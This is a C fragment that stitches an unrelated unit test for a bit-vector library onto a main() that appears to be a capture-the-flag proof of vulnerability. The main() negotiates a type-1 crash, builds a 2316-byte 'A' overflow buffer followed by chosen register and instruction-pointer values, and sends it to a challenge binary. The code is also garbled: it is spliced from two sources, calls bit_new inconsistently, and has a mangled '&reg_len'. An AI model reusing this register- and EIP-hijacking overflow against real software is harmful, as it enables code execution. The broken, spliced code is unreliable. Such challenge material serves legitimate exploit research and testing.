char *test_new()
{
a = bit_new(256);
mu_assert(a != NULL, "bit_new returns NULL.\n");
mu_assert(bit_length(a) == 256, "bit_new returns wrong length.\n");
mu_assert(bit_count(a) == 0, "bit_new returns wrong count.\n");
b = bit_new(256);
mu_assert(b != NULL, "bit_new returns NULL.\n");
mu_assert(bit_length(b) == 256, "bit_new returns wrong length.\n");
mu_assert(bit_count(b) == 0, "bit_new returns wrong count.\n");
return NULL;
}
int main(void) {
negotiate_type1(0xfefefefe, 0xfefefefe, 5);
int i, buf_len = 0;
char buf[32], *pbuf;
unsigned char exploit[4096];
unsigned char *eip = NULL, *reg = NULL;
unsigned int eip_len = 0, reg_len = 0, exp_len = 0;
char *key = " !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~";
transmit_all(STDOUT, "2\n", 2);
transmit_all(STDOUT, key, 95);
eip = append_var("TYPE1_IP", eip, &eip_len);
reg = append_var("TYPE1_REG", reg, ®_len);
memset(exploit, 0, sizeof(exploit));
bio_t *bio = bit_new(exploit);
for (i = 0; i < 2316; ++i)
{
bit_write(bio, '\x00', 1);
bit_write(bio, '\x41', 8);
}
for (i = 0; i < 4; ++i)
{
bit_write(bio, '\x00', 1);
bit_write(bio, reg[i], 8);
}
for (i = 0; i < 4; ++i)
{
bit_write(bio, '\x00', 1);
bit_write(bio, eip[i], 8);
}
exp_len = bio->didx + !!(bio->bidx > 0);
pbuf = _print_signed(buf + 32, &buf_len, exp_len + 4);
transmit_all(STDOUT, pbuf, buf_len);
transmit_all(STDOUT, "\n", 1);
buf_len = 2316 + 4 + 4;
transmit_all(STDOUT, (char *)&buf_len, 4);
transmit_all(STDOUT, exploit, exp_len);
return 0;
}
